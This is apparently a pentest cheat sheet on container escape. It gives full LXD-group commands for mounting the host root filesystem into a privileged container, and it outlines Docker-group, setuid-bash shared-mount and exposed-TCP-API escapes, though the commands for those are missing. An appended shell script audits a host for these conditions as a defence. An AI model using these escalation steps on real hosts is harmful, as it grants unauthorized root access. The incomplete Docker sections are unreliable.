Container Escape
LXD Group Exploit
Members of the lxd group can manage the entire LXD daemon, which includes creating containers that interact with the host system.
git clone https://github.com/saghul/lxd-alpine-builder
Build the image
The image must match the architecture of the target machine.
uname -m
./build-alpine -a x86_64
./build-alpine -a i686
Transfer the file to the target machine
lxc image import <filename>.tar.gz --alias myimage
lxc image list
lxc init [myimage] [container_name] -c security.privileged=true
lxc config device add [container_name] [device_name] disk source=/ path=/mnt/root
lxc start [container_name]
lxc exec [container_name] /bin/sh
cd /mnt/root
Escape Docker
Tools like nsenter or docker-exploit can be used to attempt an escape from the container.
If the user is in the docker group, attempt to run the following command to mount the host filesystem and gain access to the host:
File Ownership Manipulation via Shared Mounts
Check the permissions and ownership of files created from the host and from the container:
If the container is misconfigured and creates files as root, and the files created by the host are accessible from the container:
From the host, copy bash into the mounted directory.
From the container, change the ownership and permissions of bash to root.
Execute bash as root.
Configure Docker to listen on a TCP port
Open the Docker service file, typically at /lib/systemd/system/docker.service or /etc/systemd/system/docker.service. Change ExecStart to bind a TCP address:
Reload the daemon and restart Docker if needed:
Connect to it using docker-cli:
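As an added defensive check (not part of the original notes), the POSIX shell script below audits a host for the three conditions this page relies on: docker/lxd group membership (LXD Group Exploit and Escape Docker), a setuid file in a directory shared with a container (File Ownership Manipulation via Shared Mounts), and a Docker unit whose ExecStart binds tcp:// (Configure Docker to listen on a TCP port). The group file, unit file and shared directory are constructed sample inputs, and the function names are assumptions of this example.

```shell
#!/bin/sh
# Added audit helpers, not from the original page. Paths are parameters so the
# functions can be pointed at the real /etc/group, docker.service and volume.

# Print the member list (field 4) of group $2 from a /etc/group-style file $1.
group_members() {
    awk -F: -v g="$2" '$1 == g { print $4 }' "$1"
}

# Succeed when the unit's ExecStart passes -H/--host tcp://, i.e. the daemon
# API is reachable over the network (root-equivalent unless TLS auth is on).
docker_tcp_exposed() {
    grep -E '^ExecStart=.*(-H|--host)[= ]?tcp://' "$1" >/dev/null
}

# Succeed when at least one regular file under $1 carries the setuid bit;
# a setuid root shell planted through a shared mount shows up here.
setuid_in_dir() {
    [ -n "$(find "$1" -xdev -type f -perm -4000 2>/dev/null | head -n 1)" ]
}

# Constructed sample inputs so the script runs offline.
GROUP_FILE=$(mktemp)
UNIT_FILE=$(mktemp)
SHARED_DIR=${SHARED_DIR:-$(mktemp -d)}   # set to the host side of the volume
cat > "$GROUP_FILE" <<'EOF'
root:x:0:
docker:x:999:alice,bob
lxd:x:998:alice
EOF
cat > "$UNIT_FILE" <<'EOF'
[Service]
ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375
EOF

for g in docker lxd; do
    m=$(group_members "$GROUP_FILE" "$g")
    if [ -n "$m" ]; then
        echo "WARN: $g group is root-equivalent on the host; members: $m"
    fi
done
if docker_tcp_exposed "$UNIT_FILE"; then
    echo "WARN: Docker API bound to tcp:// in $UNIT_FILE"
fi
if setuid_in_dir "$SHARED_DIR"; then
    echo "WARN: setuid file found under $SHARED_DIR"
fi
```

Run it with SHARED_DIR set to the host path of a volume that a container can write to; the group and unit checks should then be pointed at /etc/group and the active docker.service.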